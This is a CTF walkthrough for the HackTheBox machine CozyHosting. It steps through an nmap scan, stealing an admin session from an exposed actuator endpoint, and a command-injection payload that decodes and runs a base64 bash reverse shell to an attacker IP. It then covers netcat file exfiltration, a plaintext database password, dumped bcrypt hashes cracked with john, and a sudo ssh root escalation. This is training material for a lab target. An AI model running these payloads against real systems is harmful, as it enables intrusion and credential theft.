CTF CozyHosting

CTFHackTheBox

Nmap

1
nmap -sVC -p- 10.129.9.176 -vvvv -T5

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEpNwlByWMKMm7ZgDWRW+WZ9uHc/0Ehct692T5VBBGaWhA71L+yFgM/SqhtUoy0bO8otHbpy3bPBFtmjqQPsbC8=
|   256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHVzF8iMVIHgp9xMX9qxvbaoXVg1xkGLo61jXuUAYq5q
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have the port 80 and 22 open.
The web server is running with nginx/1.18.0 on Ubuntu.
We need to add the host cozyhosting.htb to /etc/hosts.

Feroxbuster

1
dirsearch -u http://cozyhosting.htb

Output:

Get the session token

1
2
➜  ~ curl http://cozyhosting.htb/actuator/sessions
{"3879D023DE91630BC9C90933F05D01FA":"kanderson"}%

Change our session ID

http://cozyhosting.htb/admin

SSRF

Create inject a Rever Shell in base 64 then url encode it.

1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE1Ni80NTQ1IDA+JjE=

Then use it with this SSRF

1
host=127.0.0.1&username=`echo${IFS}L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE1Ni80NTQ1IDA%2BJjE%3D|base64${IFS}-d|bash`

I’m in app and there is only one file cloudhosting-0.0.1.jar

Get the file:
send it:

1
nc -w 3 10.10.14.156 1234 < cloudhosting-0.0.1.jar

Get it:

1
nc -l -p 1234 > cloudhosting-0.0.1.jar

Enumeration

/etc/passwd

1
2
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash

It’s running a postgres database
There is a user josh.

cloudhosting-0.0.1.jar

unzip it

1
unzip cloudhosting-0.0.1.jar

Find the passwords:

1
grep -rnw '.' -ie 'password'

We found them:

1
2
./BOOT-INF/classes/application.properties:12:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/application.properties:10:spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting

Connect to the database:

1
2
3
4
5
psql -h 127.0.0.1 -U postgres -d cozyhosting
\du
\dt
\d users
select name,password from users;

1
2
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

Put them into hash and crack it with john:

1
john -wordlist=/usr/share/wordlists/rockyou.txt hash

Password: manchesterunited

SSH with the user josh

1
ssh [email protected]


https://gtfobins.github.io/gtfobins/ssh/

1
sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x


Rooted